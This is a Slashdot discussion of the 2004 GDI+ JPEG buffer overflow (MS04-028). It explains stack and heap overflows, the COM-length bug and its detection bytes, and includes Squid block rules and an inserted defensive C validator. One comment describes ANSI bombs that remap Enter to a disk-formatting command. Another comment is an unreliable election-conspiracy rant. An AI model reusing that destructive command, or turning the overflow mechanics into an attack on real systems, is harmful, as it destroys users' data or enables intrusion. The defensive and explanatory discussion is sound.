      That doesn't make sense. As you browse the web, you download the image. Unless the program is something strange (Moz), then it would probably use Windows libraries to display the image, and bam.

  39. The tech note at MS tells all by Anonymous Coward · · Score: 3, Informative
    Claims Win 98SE is not affected! Great, all MS users can take a bold step back.

    TechNet Home > Security > Microsoft Security Bulletin MS04-028
    Buffer Overrun in JPEG Processing (GDI+) Could Allow Code Execution (833987)
    Issued: September 14, 2004
    Updated: September 21, 2004
    Version: 1.2

    Summary
    Who should read this document: Customers who use any of the affected operating systems, affected software programs, or affected components.
    Impact of Vulnerability: Remote Code Execution
    Maximum Severity Rating: Critical
    Recommendation: Customers should apply the update immediately.
    Security Update Replacement: None
    Caveats: If you have installed any of the affected programs or affected components listed in this bulletin, you should install the required security update for each of the affected programs or affected components. This may require the installation of multiple security updates. See the FAQ section of this bulletin for more information.

    Tested Software and Security Update Download Locations:

    Affected Software:

    Microsoft Windows XP and Microsoft Windows XP Service Pack 1 - Download the update (KB833987)
    Microsoft Windows XP 64-Bit Edition Service Pack 1 - Download the update (KB833987)
    Microsoft Windows XP 64-Bit Edition Version 2003 - Download the update (KB833987)
    Microsoft Windows Server(TM) 2003 - Download the update (KB833987)
    Microsoft Windows Server 2003 64-Bit Edition - Download the update (KB833987)
    Microsoft Office XP Service Pack 3 - Download the update (KB832332)
    Microsoft Office XP Service Pack 2 - Download the administrative update (KB832332)
    Microsoft Office XP Software: Outlook® 2002, Word 2002, Excel 2002, PowerPoint® 2002, FrontPage® 2002, Publisher 2002, Access 2002
    Microsoft Office 2003 Software: Outlook® 2003, Word 2003, Excel 2003, PowerPoint® 2003, FrontPage® 2003, Publisher 2003, Access 2003, InfoPath(TM) 2003, OneNote(TM) 2003
    Microsoft Project 2002 (all versions) and Microsoft Project 2002 Service Pack 1 (all versions) - Download the update (KB831931)
    Microsoft Project 2003 (all versions) - Download the update (KB838344)
    Microsoft Visio 2002 Service Pack 1 (all versions) and Microsoft Visio 2002 Service Pack 2 (all versions) - Download the update (KB831932)
    Microsoft Visio 2003 (all versions) - Download the update (KB838345)
    Microsoft Visual Studio .NET 2002 - Download the update (KB830348)
    Microsoft Visual Studio .NET 2002 Software: Visual Basic .NET Standard 2002, Visual C# .NET Standard 2002, Visual C++ .NET Standard 2002
    Microsoft Visual Studio .NET 2003 - Download the update (KB830348)
    Microsoft Visual Studio .NET 2003 Software: Visual Basic .NET Standard 2003, Visual C# .NET Standard 2003, Visual C++ .NET Standard 2003, Visual J# .NET Standard 2003
    The Microsoft .NET Framework version 1.0 SDK Service Pack 2 - Download the update (KB867461)
    Microsoft Picture It!® 2002 (all versions) - Download the update
    Microsoft Greetings 2002 - Download the update
    Microsoft Picture It! version 7.0 (all versions) - Download the update
    Microsoft Digital Image Pro version 7.0 - Download the update
    Microsoft Picture It! version 9 (all versions, including Picture It! Library) - Download the update
    Microsoft Digital Image Pro version 9 - Download the update
    Microsoft Digital Image Suite version 9 - Download the update
    Microsoft Producer for Microsoft Office PowerPoint (all versions)
    Microsoft Platform SDK Redistributable: GDI+ - Download the update

    Office Users Note: Office XP Service Pack 2 and Office XP Service Pack 3 are both vulnerable to this issue. However the security update for Office XP Service Pack 2 is only provided as part of the Office XP administrative security update. For more information, see the Security Update Information section.

    Office

  40. Re:SP2 Firewall by BubbleNOP · · Score: 2, Interesting

    Furthermore, you would not need a firewall if you were not running services that bound to things other than localhost. Since Windows firewall (prior to SP2, not sure whether SP2 has this functionality) doesn't let you pick who gets through to your ports, users should have the choice to shut down all ports exposed to the net. Keeping ports open and firewalled to everybody seems stupidly inefficient.

  41. ANSI Bombs by hpavc · · Score: 2, Interesting

    Does anyone remember those ANSI bombs of old? I remember BBS's had all sorts of elaborate protections against them, zipfile comments etc.

    --
    members are seeing something, you're seeing an ad
    1. Re:ANSI Bombs by pclminion · · Score: 2, Informative
      I remember ANSI bombs. For those who do not:

      ANSI.SYS was a device driver that implemented a basic "terminal protocol" on IBM PC screens back in the MS-DOS days. It could manipulate the cursor, show text in colors, and it had a few other features like key redefinition.

      An ANSI bomb was a sequence of commands to the ANSI driver. If the commands were somehow written to the terminal, they would redefine the Enter key to do something like "echo y | format c:". Thus, the next time the victim pressed Enter, the C: would be formatted.

      There were a few ways to trick your target into displaying the ANSI codes. One way was to embed them in the comment section of a pkzip archive, so that when the file was extracted the codes would be printed to the screen.

  42. Re:bug month by ConceptJunkie · · Score: 4, Insightful


    "Quality freefall"? Not really. They've always produced third tier code.


    I dunno. NT 3.51 always seemed to be rock-frickin'-solid, but then I didn't use it for long before NT 4 came out.

    Of course, Windows 95 was stillborn and they kept pumping the corpse full of formaldehyde for 5 years before they finally let it rot in peace, but the NT branch was really good until they started making every app they wrote effectively part of the core OS.

    Remember when NT ran on 4 different processor architectures and Win32 was just one API on top of the kernel in addition to Posix and OS/2? Now that IE and WMP are practically part of the kernel it seems so long ago, and yet, in a sense, it was far more advanced because it was modular enough and clean enough to be ported.

    --
    You are in a maze of twisty little passages, all alike.
  43. Re:Modify this virus to prank some friends by dpete4552 · · Score: 2, Informative

    You'd be breaking several laws in the process. So I wouldn't suggest it ;)

    --
    http://www.archive.org/details/ThePowerOfNightmares
  44. HTML-trap by HermanAB · · Score: 2, Funny
    Well, maybe it is time to change my HTML-trap poisoned files list to *.*

    That'll fix it...

    --
    Oh well, what the hell...
  45. Terminology by jjgm · · Score: 2, Informative

    Technically, this is a Trojan Horse, not a virus.

  46. It's not a virus by LS · · Score: 2, Informative

    Sorry to be nitpicky here, but this is a trojan horse, not a virus. A virus propagates through replication.

    LS

    --
    There is a fine line between being a cultivated citizen and being someone else's crop. - A. J. Patrick Liszkie
  47. Anyone think it's interesting... by JohnsonWax · · Score: 3, Interesting

    That /.ers can reference generic sounding apps like GraphicConverter and Preview without mention of the operating system?

    Apple really has come a long way around here, eh?

    1. Re:Anyone think it's interesting... by Yaztromo · · Score: 4, Interesting
      Apple really has come a long way around here, eh?

      For the record, I bought my first Mac (a 12" PowerBook G4) this past spring based in significant part on all the good things I had read about Apple's latest offerings here on /. .

      Yaz.

  48. I wish Windows was like the Mac in this area... by Chordonblue · · Score: 2, Interesting

    It's all pretty simple there. To install something you have to put in the admin password. Unix made easy.

    The way Apple does it (by app) is FAR more intelligent than having to make a user an admin or log out of the system entirely to log in as an admin.

    I have a few applications here at the school that demand admin privs. I've all but given up trying to restrict them. But as anyone who has seen the proliferation of unwanted toolbars can attest - the cost is high.

    --
    "...Well, there's egg and bacon; egg sausage and bacon; egg and spam; egg bacon and spam; egg bacon sausage and spam..."
    1. Re:I wish Windows was like the Mac in this area... by Nurgled · · Score: 2, Informative

      Windows features a "Run As..." dialog which can be used to execute a program as a different user than the one logged in. Unfortunately, it's quite hidden. To access it, one must hold down shift and right-click on the icon for the executable (or a shortcut to it) and choose "Run As...". You can then enter the username/password you wish to use and hit OK to start the program.

      Of course, it'd be better if it'd just happen automatically when you run something that requires admin privs, such as System control panel or an installer, but in the installer case there are so many different kinds of installer out there that it'd be impossible for Windows to know what's an installer and what isn't. Allowing applications to say "Hey Windows, I need to run as Administrator!" might be a solution, but then most of the worms around masquerade as things the user might want to run anyway, so they'd probably just go ahead and throw in the Administrator password much like they just click "Yes" when Internet Explorer offers to install BonzaiBuddy.

  49. I'll say it again. . . by Fantastic+Lad · · Score: 2, Insightful
    Quietly this time. . .

    Interesting that this virus, which has been in the wings and known of by select groups for years now, should at this time be given lots of promotion, (a few virus releases and big, loud press attention like a freekin' summer movie advertising run), right when the most important US election in the history of mankind is gearing up.

    Having people scared out of the public places so that they can't discuss the events which are about to unfold. . ?

    And some dorks still laugh at me and say I'm a paranoid conspiracy nut.

    --Goodness! Well, if conspiracies don't exist, why are there laws like, 'Conspiracy to commit _____' on the books? And who but the lying psychos in government are better suited to pulling such stunts? Only a nut would actually lower his/her guard over the next couple of months!

    Count on this: If any 'terrorism' happens in the next 5 weeks, you can be sure it will have been aided and abetted by the US and/or Israeli secret services.

    Not that you'll be able to talk about it on-line, what with all the scary viruses and all!

    Buckle up, kids. This stretch of road is about to get bumpy.


    -FL

  50. Tutorial on GDI Scan to find vulnerable apps by Grinler · · Score: 2, Informative

    Bleeping Computer has a tutorial on how to use GDI Scan, offered by ISC, to find apps with the vulnerable gdiplus.dll. The tutorial can be found here:

    GDI Scan Tutorial and how to fix the GDI+ JPEG Vulnerability

    Either update those apps so they don't have the problem anymore, or do not use the app.

    1. Re:Tutorial on GDI Scan to find vulnerable apps by pe1chl · · Score: 2, Interesting

      This page refers to a download location for an updated gdiplus.dll, but the extracted file is dated 04-05-2004.
      Is that really the fixed version? Did Microsoft know about this problem for so long?

  51. Better GDI+ detector by Fallen+Andy · · Score: 2, Informative

    ...at isc.sans.org (internet storm center). Do
    not use the one from microsoft. It *sucks*.
    Watch dshield (like a hawk). Read www.cert.org.
    read "comp.risks" (usenet).

    and still lose too much time..

  52. What about Clippy? by AmazingRuss · · Score: 2, Funny

    We didn't have Clippy the paperclip in 1994...those were dark times indeed. Praise be to Microsoft, for delivering anthropomorphized office supplies unto the wretched masses!

  53. I've got a workaround! by TheNarrator · · Score: 2, Funny

    The workaround is to not use any programs which require graphics. Please switch to using the command prompt for all applications until a patch has been made. Edlin is the recommended editor for security minded users. Now Microsoft just needs to post documentation on how to edit microsoft word format docs via binary editing in edlin and we'll be back to normal!

  54. How do they reencode? by SuperKendall · · Score: 3, Interesting

    MSN reencodes all images to PNG

    That brings to mind the question of if the reader on the server is using a standard library that might have buffer exploits, so that you could alter the server to start feeding out PNG's with viruses (assuming a similar attack could be found in the PNG reader in windows, not sure if that's true or not).

    --
    "There is more worth loving than we have strength to love." - Brian Jay Stanley
  55. Re:how and what by MillionthMonkey · · Score: 4, Informative

    you're a goddamn idiot. a suitably constructed jpeg will cause an overflow in the gdi+ library which ie and most msft programs use to render jpegs, when that happens the jpeg can be made such that the overflow will cause virus code to be loaded. god you're an idiot.

    Jesus, an obvious end user asks a perfectly legitimate question and you call him an idiot for being surprised by the notion of a hostile JPEG- something that should rightfully amaze everybody. I doubt he understood your high level description. To the grandparent: here is a meandering crappy description of how a buffer overflow attack works:

    A function call, in C, pushes the current program counter on the stack. Then it pushes the arguments onto the stack, and control jumps to the function which pops the arguments off the stack and does whatever with them. At the end it invokes a RET instruction that pops the program counter back off the stack and control jumps to the address there (to the point right after the CALL). These are just normal C calling conventions.

    Variables defined in the function are stored on the stack. If a string like a URL (for example) needs to be defined, a buffer is allocated for it there. When the function returns, the space is automatically deallocated, the RET pops the program counter off the stack, and the function call returns. By default no bounds checking is done on data stored in these buffers. Some library functions, like gets(), don't do bounds checking. They can't, since they don't know the buffer size and would need to have it provided as an argument. Newer, safer versions exist that do take buffer size arguments, but that means these aren't the same library functions anymore. (FWIW the gets() call takes a pointer to a buffer of unknown size as an argument, reads a newlined string from stdin into the buffer, and returns the buffer pointer that was passed to it.)

    It's up to the programmer to do bounds checking if he uses library calls vulnerable in this way. But this is extra work, and people are lazy. It's easier to just allocate a big, big buffer that's probably larger than you'll ever need, that "no reasonable URL" will ever exceed. So the programmer allocates a fixed 10K buffer on the stack and passes its address to a library function like gets().

    The attacker gains control in these situations by creating a program input like a long, carefully crafted URL, slightly longer than 10K, that overflows the buffer inside the library function. The goal is to overwrite the return address on the stack with an address that's within the buffer. In the case of the Code Red worm, someone meticulously put together a URL that attacked an obscure ISAPI routine, and not only overwrote the return address, but also had machine code instructions waiting at the replacement address within the buffer- encoded right into the damn URL! (The buffer has been deallocated at this point, but hasn't been zeroed, so it's still there.)

    It's harder to explain with a JPEG than with a URL. But a JPEG contains variable length data structures that are read into buffers on the stack. Someone writing the JPEG decoder forgot to do a bounds check- and so a mundane function for decoding JPEGs never returns. Instead it jumps into an endless loop that's been placed within the image buffer by the attacker.

    So yes it is a bit like running an .EXE file, except for the fact that the code is hiding inside what is supposed to be data, not code, and it gains control of the CPU by smashing the stack.

    Older versions of Notepad gagged on files larger than 64K, which seems suspicious. It's theoretically possible that a vulnerability could exist even in a text editor like Notepad allowing a carefully constructed .TXT file to execute arbitrary code. Who knows?

  56. Is this based on the Independent JPEG Group lib? by fraktus · · Score: 2, Interesting


    From www.ijg.org. This library is very popular.
    And if yes, are all application linking this library subject to the vulnerability?

    If yes this will be a lot of work to update all applications.

    --
    In cyberspace nobody knows you're a cat!
  57. Re:how and what by MillionthMonkey · · Score: 4, Informative
    Here are the low level details of the JPEG exploit:
    JPEG Comment sections (COM) allow for the embedding of comment data into a JPEG image. COM sections are marked beginning with 0xFFFE followed by a 16 bit unsigned integer in network byte order giving the total comment length + the 2 bytes for the length field; a single JPEG COM section could therefore contain 65533 bytes of invisible data (invisible in the sense that it's not rendered as part of the image). Because the JPEG COM field length variable is 2 bytes wide, and itself is included in the length value, the minimum value for this field is 2; this implies an empty comment. If the comment length value is set to 1 or 0, a buffer overflow occurs overwriting heap management structures.

    The problem is GDIPlus normalizes the COM length prior to checking its value; a starting length of 0 becomes -2 after normalization (0xFFFE unsigned). This value is converted to the 32 bit value 0xFFFFFFFE and is eventually passed on to memcpy, which attempts to copy ~4G bytes into heap memory.

    eEye Digital Security analyzed the bug and found that heap management structures are left in an inconsistent state with execution eventually reaching heap unlink instructions within RTLFreeHeap with EAX pointing to a pointer to data we control and we have direct control of EDX.

    Detection could be accomplished by examining the JPEG image for the following byte sequence:

    0xFF 0xFE 0x00 0x00 or 0xFF 0xFE 0x00 0x01

    So you see what happened. The unchecked library call in this case was memcpy(). The decoder trusts its input and sends a small signed integer (-2) off to memcpy() without checking the sign bit- and memcpy() thinks -2 is a huge unsigned integer (4294967294). What's the difference? Any reasonable number is going to be positive anyway, right? Who would give a comment a negative length!

    I saw someone make this kind of goof even in Java, where you have signed-only types forced on you. Someone forgot that InputStream.read() returns an unsigned byte as an int (between 0-255), and they cast it to a signed byte and back without the &0xFF to zero out the 24 high bits. That got caught right before our product release. The consequence in that case would have been a hash algorithm with inconsistent output between stream and byte array inputs- not a security nightmare like this, but a long lasting migraine nevertheless.
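    The COM-length handling and the detection check described in this comment, as an added example in C that is not from the thread or from GDI+ itself: the unchecked function computes the byte count the comment says reached memcpy() (no copy is performed), the checked version validates the raw field before subtracting, and a small marker walker flags a COM segment whose length is 0 or 1. Reading the field as a signed 16-bit value and the sample JPEG byte strings are assumptions made for the example.

```c
/* Added example; models the COM length bug described above, not GDI+ code. */
#include <stdint.h>
#include <stddef.h>
#include <stdio.h>

#define JPEG_COM_MARKER 0xFE

/* Unchecked variant (assumed model of the bug): normalise first, validate never.
 * Returns the byte count that would be handed to memcpy(); nothing is copied. */
uint32_t com_payload_len_unchecked(const uint8_t *seg)
{
    int16_t len = (int16_t)((seg[0] << 8) | seg[1]); /* assumed: treated as signed 16-bit */
    len -= 2;                  /* strip the length field's own 2 bytes: 0 -> -2, 1 -> -1 */
    return (uint32_t)len;      /* sign-extended: -2 -> 0xFFFFFFFE, i.e. ~4 GB */
}

/* Hardened variant: validate the raw field before normalising it.
 * Returns the payload length (0..65533), or -1 for a malformed segment. */
int com_payload_len_checked(const uint8_t *seg, size_t avail)
{
    if (avail < 2) return -1;                      /* not even a length field */
    uint16_t len = (uint16_t)((seg[0] << 8) | seg[1]);
    if (len < 2) return -1;                        /* field includes itself, so 0/1 is invalid */
    if ((size_t)len > avail) return -1;            /* must also fit in the bytes we have */
    return (int)(len - 2);
}

/* Detection: walk the marker segments before the first SOS and report a COM
 * segment carrying length 0 or 1 (the FF FE 00 00 / FF FE 00 01 pattern above).
 * Returns 1 if found, 0 if clean, -1 if the data is not a JPEG or is truncated.
 * Simplification: segments after SOS (inside entropy-coded data) are not walked. */
int jpeg_has_bad_com(const uint8_t *buf, size_t n)
{
    size_t i = 2;
    if (n < 4 || buf[0] != 0xFF || buf[1] != 0xD8) return -1;   /* SOI required */
    while (i + 1 < n) {
        if (buf[i] != 0xFF) return -1;                           /* expected a marker */
        uint8_t m = buf[i + 1];
        if (m == 0xFF) { i++; continue; }                        /* 0xFF fill bytes */
        i += 2;
        if (m == 0xD8 || m == 0x01 || (m >= 0xD0 && m <= 0xD7)) continue; /* no length */
        if (m == 0xD9 || m == 0xDA) return 0;                    /* EOI or SOS: stop */
        if (i + 2 > n) return -1;
        uint16_t len = (uint16_t)((buf[i] << 8) | buf[i + 1]);
        if (m == JPEG_COM_MARKER && len < 2) return 1;           /* the bad COM */
        if (len < 2 || i + len > n) return -1;                   /* otherwise malformed */
        i += len;
    }
    return -1;
}

/* Constructed sample streams (not real images): SOI, one COM segment, EOI. */
static const uint8_t SAMPLE_BENIGN[]   = {0xFF,0xD8, 0xFF,0xFE,0x00,0x07,'h','e','l','l','o', 0xFF,0xD9};
static const uint8_t SAMPLE_BAD_ZERO[] = {0xFF,0xD8, 0xFF,0xFE,0x00,0x00, 0xFF,0xD9};
static const uint8_t SAMPLE_BAD_ONE[]  = {0xFF,0xD8, 0xFF,0xFE,0x00,0x01, 0xFF,0xD9};
static const uint8_t SAMPLE_TRUNC[]    = {0xFF,0xD8, 0xFF,0xFE,0x00,0x10,'a','b'};

int main(void)
{
    printf("unchecked length for COM 00 00: 0x%08X\n", com_payload_len_unchecked(SAMPLE_BAD_ZERO + 4));
    printf("checked length for COM 00 00:   %d\n", com_payload_len_checked(SAMPLE_BAD_ZERO + 4, 4));
    printf("benign: %d  bad-zero: %d  bad-one: %d  truncated: %d\n",
           jpeg_has_bad_com(SAMPLE_BENIGN, sizeof SAMPLE_BENIGN),
           jpeg_has_bad_com(SAMPLE_BAD_ZERO, sizeof SAMPLE_BAD_ZERO),
           jpeg_has_bad_com(SAMPLE_BAD_ONE, sizeof SAMPLE_BAD_ONE),
           jpeg_has_bad_com(SAMPLE_TRUNC, sizeof SAMPLE_TRUNC));
    return 0;
}
```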
  58. No update available for MS Office yet by buro9 · · Score: 2, Informative

    The GDI Scan tool from ISC reveals that after all of the latest patches for Windows and Office, I am still left with vulnerable .dll files within office.

    Further... the version of the GDI redistributable on the MSDN site still includes a vulnerable version of the GDI .dll dated May 2004.

    On this fully patched Windows XP system GDI Scan reveals the following information:

    Scanning Drive C:...
    C:\Program Files\Common Files\Microsoft Shared\Office10\MSO.DLL
    Version: 10.0.3501.0 -- Possibly vulnerable (Under OfficeXP only)
    C:\Program Files\Common Files\Microsoft Shared\OFFICE11\MSO.DLL
    Version: 11.0.6360.0
    C:\Program Files\Common Files\Microsoft Shared\VGX\vgx.dll
    Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
    C:\Program Files\Microsoft Office\OFFICE11\GDIPLUS.DLL
    Version: 6.0.3264.0
    C:\Program Files\Microsoft Works\GDIPLUS.DLL
    Version: 5.1.3102.1360
    C:\WINDOWS\$NtUninstallKB833998$\sxs.dll
    Version: 5.1.2600.1106 -- Possibly vulnerable (Backup for uninstall purposes)
    C:\WINDOWS\$NtUninstallKB839645$\sxs.dll
    Version: 5.1.2600.1336 -- Possibly vulnerable (Backup for uninstall purposes)
    C:\WINDOWS\system32\dllcache\sxs.dll
    Version: 5.1.2600.1515
    C:\WINDOWS\system32\dllcache\vgx.dll
    Version: 6.0.2800.1106 -- Possibly vulnerable (Win2K SP2 and SP3 w/IE6 SP1 only)
    C:\WINDOWS\system32\sxs.dll
    Version: 5.1.2600.1515
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.0.0_x-ww_8d353f13\GdiPlus.dll
    Version: 5.1.3097.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.10.0_x-ww_712befd8\GdiPlus.dll
    Version: 5.1.3101.0 -- Possibly vulnerable (Windows Side-By-Side DLL)
    C:\WINDOWS\WinSxS\x86_Microsoft.Windows.GdiPlus_6595b64144ccf1df_1.0.2600.1360_x-ww_24a2ed47\GdiPlus.dll
    Version: 5.1.3102.1360
    Scan Complete.

    What you can do now to limit the spread:
    * Update all of your virus checkers and make sure that they are fully active (auto, not just on-demand).
    * Disable images in your email applications, just use text only.
    * Switch your primary browser to Firefox or another browser whose latest version is immune from this specific attack. If you have to still use IE, then do so only for sites you truly trust.

  59. app not working != app vulnerable to virus by sczimme · · Score: 4, Insightful


    * Eye of Gnome seemed to work okay, but I got all sorts of weird redraw problems when I tried to resize the window.
    * Gimp (2.1) says the JPEG is unsupported and couldn't be imported by the filter, then segfaults.
    * Konqueror seems to work okay, but just shows a tall black rectangle, and its spinner is still chugging away, as if it's still busy loading something.
    * Firefox 0.9.3 has no troubles at all; it just shows a nice white rectangle on a white background

    These programs are not vulnerable to the exploit in the same way that Windows machines are vulnerable. In fact, the issues you saw appear to be in no way related to the intended result of the virus. GIMP's segfault seems to be the most serious of these, and it is still a minor problem. I believe all of your results can be achieved by opening a mangled/corrupted .jpg; the exploit code is irrelevant.

    Nutshell: One cannot conclude that graphics-related processes/apps on Linux machines are vulnerable to this virus.

    PS Conclusions posited based on "unprofessional research and wild conjectures" are likely to cause much more harm than good. Is this really necessary? (not a flame - just an observation)

    --
    I want to drag this out as long as possible. Bring me my protractor.
    1. Re:app not working != app vulnerable to virus by ajs · · Score: 4, Insightful

      I don't think the poster was saying "these programs are vulnerable to this virus", but rather, "these programs seem to be vulnerable to a similar class of exploit"

      Certainly Gimp's segfault points to some sort of bounds-checking problem, and is likely exploitable. NO application should load this image for display. Bounds checking during load should throw an exception (or the equivalent error status for C) for the image and the application should report that the image is corrupt. Under no circumstances should a low-level library be handing this image data further up the chain.

    2. Re:app not working != app vulnerable to virus by rjshields · · Score: 2, Insightful

      You make it sound like there's a possibility this exploit might work under one of the aforementioned softwares' image processing libraries.

      This exploit was designed to work under Microsoft code, so the chances of it working under any other image processing code are slim to none, unless some other programmer has coincidentally designed their code in precisely the same way and made exactly the same mistake.

      Sorry, but this should be obvious.

      --
      In this world nothing is certain but death, taxes and flawed car analogies.
  60. Block all access to that particular host on proxy! by Anonymous Coward · · Score: 3, Informative
    For all admins, simply block all access to that host on your proxy/firewall.
    Be quick.

    Sample squid code:

    acl jpeg_exploit dst 209.171.43.27
    http_access deny jpeg_exploit

    Or, more reasonable:
    acl block_dsthost dst "/usr/local/squid/etc/dsthost.list"
    http_access deny block_dsthost

    and stick 209.171.43.27 into that file (and all following IPs that will use that code).

    Then use ClamAV to scan your squid-cache the next couple of days and remove infected files.

  61. The fun never stops by mwood · · Score: 2, Insightful

    There's been some discussion of the problems facing "fleet operators" due to this bug. It seems that various product teams have spewed so many private versions of the .DLLs all over users' systems that the people who maintain the security-patch list in XML just gave up. SMS won't detect the need for the patch, and neither will MBSA, I'm told. Whether SUS (standalone, not the Feature Pack for SMS) will is not yet clear.

    Well, that's just dandy. I've got 200 machines that need patching and no centralized tools, maybe. Oh, joy.

    Now I'm wondering how I'll ever trust those tools again.